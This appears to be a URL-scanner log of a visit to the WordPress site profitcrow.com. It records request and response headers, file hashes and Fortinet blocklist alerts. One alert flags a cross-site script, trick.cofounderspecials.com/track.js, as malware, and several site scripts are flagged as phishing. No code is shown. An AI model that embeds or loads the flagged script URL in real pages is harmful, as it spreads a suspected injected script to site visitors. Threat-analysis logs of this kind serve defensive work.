Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 12133
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (57726)
Size:   12133
Md5:    f463afd8661ddc733305df1f0cbdaff2
Sha1:   77262f0209e75e340eb7014aba9cd8d69966032f
Sha256: c4b6541be58a0ca61549cd4562850315077880c459c019f01e835cf2d7b764de
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 286
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (483)
Size:   286
Md5:    8828fa3c5bdcfa66615714a2b8c9d807
Sha1:   4f556d0b005ac7754af607418df445f8cf98e8b1
Sha256: 16950dcce60bc3ee2613b60439c99e7ed74d10245f59fe6f68346b7e72dd95e7
                                        
                                            GET /wp-content/uploads/pum/pum-site-styles.css?generated=1641964841&ver=1.16.2 HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 12 Jan 2022 05:20:41 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3102
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (7400), with CRLF, LF line terminators
Size:   3102
Md5:    920f89b21ad5a2d8ed4efa9f0fda0b03
Sha1:   648ae8495290bbe008f86f0638162dded33a3f16
Sha256: e97e6e5e0ed3ce4ed759ddd41f67f288240459a78cf350d40359b83c6ec47699
                                        
                                            GET /wp-includes/js/mediaelement/wp-mediaelement.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Sat, 08 Jun 2019 06:15:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 982
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4186), with no line terminators
Size:   982
Md5:    24f4d7f425e792ab35adaab50816e54a
Sha1:   9e25bf79b674ddb7ba09ad7f118c50ec473c02c8
Sha256: 1c78bfb4d523785a4ebd37bb1f79f214f9bdb16673f7cc50805f7f1a26ad7f83
                                        
                                            GET /track.js?v=9.999 HTTP/1.1 
Host: trick.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.112
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 25 Nov 2022 22:08:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Fri, 29 Jul 2022 15:36:49 GMT
ETag: W/"5b0-5e4f36b22e013"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   729
Md5:    604eea713faef1ae8dafc0224112e662
Sha1:   89f4a04f3088b7fdb308cd0af944a38c6ed99c2b
Sha256: 3905c65876c7b7c1f0a8efae5c758b100d3903c2f94e7177285e898c80eb10f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/elementor/thumbs/2-pmkl2wqht9wn13yhe2adcrd3furau760twajm8xi1g.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 08:34:39 GMT
accept-ranges: bytes
content-length: 13030
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   13030
Md5:    ec96ac85442a6381a7e762e716974df4
Sha1:   879e3d5c7965091b1aff35feb5a7a7b8b4c83fd8
Sha256: 78e1791fc3b878a7a461d68a098d7a3d7ec3bc21ab5ca5ffdd6d81abb571e7e7
                                        
                                            GET /wp-content/uploads/elementor/thumbs/Untitled-4-pi82g9b1s4qlpfyf5iy2ov6tttz3gdf0qamvz4fxgg.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 29 Dec 2021 10:41:38 GMT
accept-ranges: bytes
content-length: 5086
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced\012- data
Size:   5086
Md5:    76aa60c2d1385f56e5b05560927cdfb7
Sha1:   8867884634b19102e751a2441b2f45f86fad792d
Sha256: bc97a3f653cfc70af9b11a489149c6741f0e51a1acc1cf5c39627cb57003a763
                                        
                                            GET /wp-content/uploads/elementor/thumbs/3-pmkfrnip7u3apfrn6w45iito4ffnnaw6v9mvaeia38.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 06:34:43 GMT
accept-ranges: bytes
content-length: 9349
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   9349
Md5:    a1aa7295ba56eb8716240a1792bf5d5d
Sha1:   441badab503b3466a7fe589fedf298fa3bacb192
Sha256: 1b87b30adff34e79488b34e0dd5c616f9b464ced0172da0ee0c591585491818a
                                        
                                            GET /wp-content/uploads/elementor/thumbs/1-pmkl57gaip1vesmbz21jg6hnprflnkaeh9p9uliutw.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 08:34:39 GMT
accept-ranges: bytes
content-length: 14777
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   14777
Md5:    a62538a857b9423187a009083b45aa16
Sha1:   424f3f7c6208b9fc25db044a655fd3258dc02be2
Sha256: 87cf17d8ba09369f62c1906e29b066341763c3cb95ec6c2cc596a80bd7861ccb
                                        
                                            GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1751
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1213)
Size:   1751
Md5:    12045a493fe71cd86696bc193d512d1e
Sha1:   7e061eb7721ac84f1ae59d093af07dc756937e6e
Sha256: 2b94f6d902c60d5376a162522874fccdc8d7e54c1befbab1df32091f0f68364a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/mediaelement/wp-mediaelement.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1678
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (928)
Size:   1678
Md5:    a1482c9dcef3633f83929e0f810a0939
Sha1:   697c20961e00099597911848396ae7a6051808ab
Sha256: 17f72ff4442a051ac09b971abedc3c8278f9ad192b99cb60db1908393d5f1857

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/dist/vendor/wp-polyfill.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8194
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (19160)
Size:   8194
Md5:    a6433517266477ff06e6f99332ba4b51
Sha1:   10d396d74458024e4cef9da9bde6f640c7255d62
Sha256: 4ac649253d4eaf595a196a7a50def87064451a81f702f35ef7f2ced7e04b1d12

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/animations/animations.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2442
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10019)
Size:   2442
Md5:    d2db71c82a8f672aea59a3e050cd8cd7
Sha1:   af626566f94b3164e4310288cfb142431e8349a6
Sha256: bcd2c9c2ba22a48a8fabf9fbe5e947deb6404367e4be24f48326e302aead1180
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/index.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 11:30:13 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4852
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (11884)
Size:   4852
Md5:    5b1cb80f27a0b3ce5c5911ac842cd370
Sha1:   108ef33ff23345ae3deea8c96d6f51e77b59d8a4
Sha256: 8e9fad5c6fcc62d5a7868bdb202fdfdb602a444b42f1e7faa4345beedb7c5a8d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 17 Dec 2020 14:57:07 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1762
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1762
Md5:    64f4fafbb654071b435c0d8429ff2424
Sha1:   1a9368b246c6e2303f01052f1bdd4e565a6e8754
Sha256: a1fabf1c4dd892f4d9b9c5c791619c9971f4b69d396677ec98bc04876243369a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F56b1fea9-e9cd-44f8-a1ed-26557538d958.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12319
x-amzn-requestid: 6973e196-9eb3-4aea-9c60-b8e2158641ea
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVOoGkgIAMFY4Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63813590-62965d4c607d4f0a060265d9;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:37:20 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: U2lRuGTHsBCJ7HqZcNbwMXTuNJsghqL0p-hMJyUfiWAdXla2pJ6JRw==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 a3bd0eb50c22e4d5fbda56a30b96002c.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
etag: "fd67260f92d7faee2360956e8d2ed50a00c1dbcf"
age: 1318
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12319
Md5:    8a82cc688f934411a894427bd493c429
Sha1:   fd67260f92d7faee2360956e8d2ed50a00c1dbcf
Sha256: fbd1a487dac7233861d173e711218d3e3402bc71f538025c540b93696309dc67
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1dd98515-d0af-440a-8f3d-4c9986928081.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4309
x-amzn-requestid: a22b4d7e-e208-4bda-81c2-d13e6463380e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: blE0hGNioAMF_Tg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371e81c-1b13846866f56a0e47675e56;Sampled=0
x-amzn-remapped-date: Mon, 14 Nov 2022 07:02:52 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0sYKpJWi2Tv9Atz3PYXm5j7kmncAOxjcLcK4hgAkJ5b4pNMDmjdB6g==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 04:38:44 GMT
age: 62960
etag: "126771b86638108050cf57c0d12faa27f80f0edb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4309
Md5:    841a4b110022a99ddea6f7bf66df0fa1
Sha1:   126771b86638108050cf57c0d12faa27f80f0edb
Sha256: 240fbffc1f9104433297d3ff7afba2d0b58d7f1b13d9a9260a1bad25216665db
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F53b989dd-5b05-43e6-807e-30a5611591c1.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12505
x-amzn-requestid: a89c780f-e1a4-451e-842b-656ba43958be
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVOeHzfIAMFpGQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381358f-3478b6c81d94ec65388bd3da;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:37:19 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
